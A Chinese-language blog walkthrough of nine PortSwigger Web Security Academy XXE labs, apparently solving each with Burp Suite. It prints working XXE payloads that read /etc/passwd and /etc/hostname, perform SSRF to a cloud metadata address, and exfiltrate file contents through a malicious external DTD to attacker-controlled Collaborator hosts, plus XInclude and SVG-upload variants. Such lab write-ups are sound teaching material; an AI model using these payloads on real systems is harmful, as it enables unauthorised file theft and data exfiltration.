All labs | Web Security Academy (portswigger.net)

1. Exploiting XXE using external entities to retrieve files

使用外部实体利用 XXE 来检索文件

检查库存功能用 burp 截断数据包,然后松手在 HTTP History 中查看请求,转到 Repeater。

往下看,当看到 XML 的时候,应该考虑 XXE 注入。接下来就是找到注入点,具体位置有两个,一个是 productId,另一个是 storeId。

在 XML 声明和元素 stockCheck 之间插入外部实体定义。

1
2
3
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

# 定义了一个名为 xxe 的实体,它指向文件系统中的 /etc/passwd 文件。

230221PM04_2

2. Exploiting XXE to perform SSRF attacks

利用 XXE 执行 SSRF 攻击

依旧是抓包检查库存功能,会发现有一个包含 XML 的帖子请求。

声明一个外部实体,不再引用本地文件而是查看是否可以发送到 IP 地址169.254.169.254

Send 发送请求,从响应中得到目录,连续往下遍历目录,最后获得敏感信息。

230221PM05_4

230221PM05_5

230221PM05_6

230221PM05_7

230221PM05_8

230221PM05_9

3. Blind XXE with out-of-band interaction

带外交互的盲 XXE

访问产品页面,单击“检查库存”并在 Burp 中拦截请求。

定义外部实体,插入 Burp 的协作子域名。转到“子域名”选项卡,然后单击“Poll now”。 可以看到 DNS 和 HTTP 交互。它的作用是,确认我们可以让应用程序与攻击者控制的对话服务器,为带外渗透做好准备

1
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://1hj71n3ymgjdmmtrt6ye3mqcf3lt9i.oastify.com"> ]>

230222AM10_11

230222AM10_12

4. Blind XXE with out-of-band interaction via XML parameter entities

通过 XML 参数实体进行带外交互的盲 XXE

外带交互的盲 XXE 是通过利用 XML 解析器向==外部服务器(burp 子域)==发送数据,使得攻击者可以==通过外部服务器与目标系统进行交互==。

1
2
3
4
5
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://1hj71n3ymgjdmmtrt6ye3mqcf3lt9i.oastify.com"> %xxe; ]>

# 定义了一个名为 xxe 的参数实体,它指向一个远程 URL http://……
# 使用了 % 操作符来引用实体,%xxe --> 表示引用实体xxe
# XML 文档被解析时,实体引用(%xxe; )将会被展开并替换为实体声明中的值(也就是远程 URL),而可能导致系统被攻击者控制的服务器接管。

Quote / 参考

盲XXE(Blind XXE),它可以在没有直接访问应用程序响应的情况下,仍能从应用程序中获取敏感信息。

230222AM11_13

5. Exploiting blind XXE to exfiltrate data using a malicious external DTD

利用盲 XXE 使用恶意外部 DTD 泄露数据

1
2
3
4
5
6
7
8
9
10
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://0abk7wm21os9liaqg27kek4ic9iz6o.oastify.com/?x=%file;'>">
%eval;
%exfil;

# 定义了一个名为 file 的外部实体,它包含了 /etc/hostname 文件的内容。可以利用此实体来访问并泄露目标系统中的文件内容

# 这一行定义了一个名为 eval 的外部实体,它包含了一个实体声明 exfil,该实体可将 file 实体的内容发送到攻击者控制的服务器。exfil实体的定义包括一个URL,该URL包含攻击者控制的服务器地址和将file实体的内容作为查询参数的字符串。在这种情况下,exfil实体将文件内容发送到http://0abk7wm21os9liaqg27kek4ic9iz6o.oastify.com/,并将file实体的内容作为查询参数x的值。

# %eval; %exfil; 这两行将eval实体和exfil实体插入到XML文档中。攻击者可以将这些实体插入到一个合法的XML文档中,并发送给目标系统进行解析。在解析XML文档时,目标系统将解析eval实体,然后解析exfil实体,从而触发将file实体的内容发送到攻击者控制的服务器的行为。

将 DTD 文件保存在服务器上,单击“查看漏洞”并记下 URL;用 burp 截断检查库存的请求,定义外部实体

最后返回 Burp Collaborator client,会看到一些 DNS 和 HTTP 交互,特别关注 HTTP 交互,可能包含文件的内容。/etc/hostname

1
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a57006c0302b2d5c0e221d8013c0082.exploit-server.net/exploit"> %xxe;]>

230222PM12_17

230222PM12_16

230222PM12_15

6. Exploiting blind XXE to retrieve data via error messages

利用盲 XXE 通过错误消息检索数据

1
2
3
4
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

将 DTD 文件保存在服务器上,单击“查看漏洞”并记下 URL;用 burp 截断检查库存的请求,定义外部实体,会看到一条包含文件内容错误消息

1
2
3
4
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a42007304c1c092c003856801a900e4.exploit-server.net/exploit"> %xxe;]>

# 定义了一个名为 foo 的 DTD 声明,其中包含了一个名为 xxe的 外部实体。
# xxe 实体的定义包括一个 URL,该 URL 指向服务器上的一个文件,文件包含敏感信息。在这种情况下,可以将获取的信息发送到 https……

230222PM02_18

7. Exploiting XInclude to retrieve files

利用 XInclude 检索文件

抓包检查库存功能,修改 productId 的值

1
2
3
4
5
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

# 这个XML文档定义了一个名为foo的元素,并且通过XML命名空间定义了一个名为xi的前缀,它的命名空间是"http://www.w3.org/2001/XInclude"。然后,它使用了`xi:include`元素来指定要包含的内容,包括`parse`和`href`属性。

# parse属性指定了包含的文件是以文本方式解析的,而不是XML方式解析。href属性指定了要包含的文件的路径,这里是file:///etc/passwd,也就是本地系统上的/etc/passwd文件。由于该文件包含有关用户帐户的信息,因此攻击者可以使用这种技术来收集系统信息并进行其他攻击。

230222PM03_19

8. Exploiting XXE via image file upload

通过图像文件上传利用XXE

下载一个SVG 文件(注意不要太大),上传 SVG 文件,发表评论的时候抓包,修改 SVG 文件的内容

Expand / 拓展

SVG 文件是由 XML 构成的,因此可以使用 XML 的各种功能来嵌入数据或 payload 到 SVG 图像中。由于 SVG 图像可以包含文本、图形和脚本等元素,因此可以使用这些元素来嵌入payload

1
2
3
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

# 当SVG文件被处理时,xxe实体会被解析为文件/etc/hostname的内容,然后将该内容作为文本元素的内容插入到SVG图像中,从而显示该文件的内容。

230222PM05_25

230222PM04_24

9. Exploiting XXE to retrieve data by repurposing a local DTD

利用 XXE 通过重新调整本地 DTD 的用途来检索数据

抓包检查库存功能

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

# 定义名为“file”的实体,并将其设置为/etc/passwd文件的路径,然后通过将这个实体插入到另一个名为“eval”的实体中,最终触发了漏洞,导致可以读取系统上的/etc/passwd文件的内容。同时,攻击者也定义了一个名为“error”的实体,用于报告错误信息。

230222PM05_26

评论

© Rabbit 使用 Stellar 创建

✨ 营业:

共发表 56 篇Blog 🔸 总计 123.6k